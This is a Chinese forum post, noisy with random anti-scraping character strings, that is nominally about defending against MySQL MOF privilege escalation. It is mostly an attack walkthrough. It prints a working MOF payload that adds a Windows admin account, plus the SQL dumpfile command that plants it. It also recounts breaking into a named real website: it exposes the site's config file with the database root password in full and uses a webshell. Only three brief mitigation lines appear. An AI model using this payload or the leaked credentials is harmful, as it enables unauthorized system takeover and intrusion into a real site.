Mysql mof扩展漏洞防范方法% K+ P5 _2 F+ S n( T& l4 y
% R9 _5 r7 b% \8 W, N L5 p/ L
网上公开的一些利用代码:
% u: V6 g4 i7 J+ U7 f
8 k& Z8 j |" R* H0 s0 e5 F#pragma namespace(“\\\\.\\root\\subscription”); c& v Z v9 D2 D$ O! l& K0 x
q3 M2 ?5 G; `% W5 e& Minstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
) A. ^1 X% }& r5 ^" w/ G- J
8 }9 U3 L; `+ h0 ` / M% {- X7 Z% a& V3 ?+ b
" N/ a3 {* V4 D, M& P: T8 ]) s! X
+ f0 J$ Q/ n, j0 ^' I
! e t' n8 X/ G- b3 V
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;8 P! y6 H* I& ^
从上面代码来看得出解决办法:/ Q7 l/ l; Z1 E1 g
; X' h- C& n( k+ H. _+ y3 j1 Z1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
$ z0 y2 A5 u, I+ g: v" K6 I: |& c5 y5 |, _) e! E i% z% B
2、禁止使用”WScript.Shel”组件
4 _7 s6 X7 Q9 j% k4 f
3 a0 f( e, j: p X3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
3 U$ x" H: w$ g3 F0 m X% L9 Y; f& M% P
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下- D$ t* i9 v: L% y1 x
- n2 L2 U% }4 H9 ]! n- X事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权 n& F5 |& J/ j6 Q% p9 L
' }: t, d. x3 {& N" A2 u% Y0 ]/ l
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容, N- ^3 v. h1 R& z3 [3 A
! J( h# s0 @/ J' c$ p! S看懂了后就开始练手吧
; w5 C( @3 h* Z- W
, y: H% k; k5 Z4 T; bhttp://www.webbmw.com/config/config_ucenter.php 一句话 a7 X" G% q' p9 F- n
- Q' N Y+ y) o W$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。! B* _6 t# ]- O
4 u f. Z" M X# y+ J- v* Z
于是直接用菜刀开搞8 k9 q8 S7 d! F8 }
" |$ X5 Z! Z7 P7 p
上马先
) }( y; c; }- d9 I9 Z! Y' L) K* {
0 k! A4 m! z8 a; k: S) O既然有了那些账号 之类的 于是我们就执行吧…….' F7 }! C t8 h* k' b2 n5 o5 d
$ J: w& g3 o+ G/ I( ?" D小小的说下
" p- O, |/ s& |+ H* g9 C# }2 b1 f* C) S, e3 R0 O; E& Z' B
在这里第1次执行未成功 原因未知( S- w7 n4 ]' I
2 X. F' H* q, M3 D我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。' `0 n h0 a' B" E: s) I- B
% `0 D4 x1 C0 L( u' v; Q+ |/ J* p! L#pragma namespace(“\\\\.\\root\\subscription”)
3 N! T# j0 Y! @5 z* G8 B P& l2 f/ ^0 Q- e* {9 H9 H
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; p$ D# M$ K4 e5 O' q
/ n7 h6 j0 ^6 h7 Y, j# Q# g
我是将文件放到C:\WINDOWS\temp\1.mof' i, y$ s$ s7 C2 H( d" |1 I5 a9 L
5 Y/ I$ [! g/ m: Q; y( v
所以我们就改下执行的代码" Y0 |( t! |3 n/ f) c$ f5 P3 y
2 k: d( l" m+ Lselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;, e) W* o) W/ p
- y, p! p2 Z( C) J6 R8 u+ j; G
6 D6 }' ?6 m3 v: d9 ?6 \0 a T* a- ~- m# q" I9 B% `2 Y0 S
但是 你会发现账号还是没有躺在那里。。
2 L# n: w# T( Y9 k, G# x0 c9 {
1 |# z0 b7 ~% Y. O, ?5 Q于是我就感觉蛋疼
b, y; p5 P$ |- }3 @
: o& m, E4 \/ g0 e( x7 o就去一个一个去执行 但是执行到第2个 mysql时就成功了………+ L" f( w1 D% @6 g& ^
! Q/ k! J. n* y; x2 d. J; T. m9 m2 K" `5 H4 V) ~
) i1 e- ]/ L# n, }, X但是其他库均不成功…6 W2 U9 d+ g+ j
5 U7 |) I h# I" Q0 {: U- F: J我就很费解呀 到底为什么不成功求大牛解答…
- {: ~: D0 B" X3 l
" `* {6 a9 q/ v& V6 P# g3 r
$ _# S- y' [* R5 H1 |! j( n
+ a! V5 ^ u0 s# M. S |
发表于 2013-1-4 19:49:49
收藏
支持
反对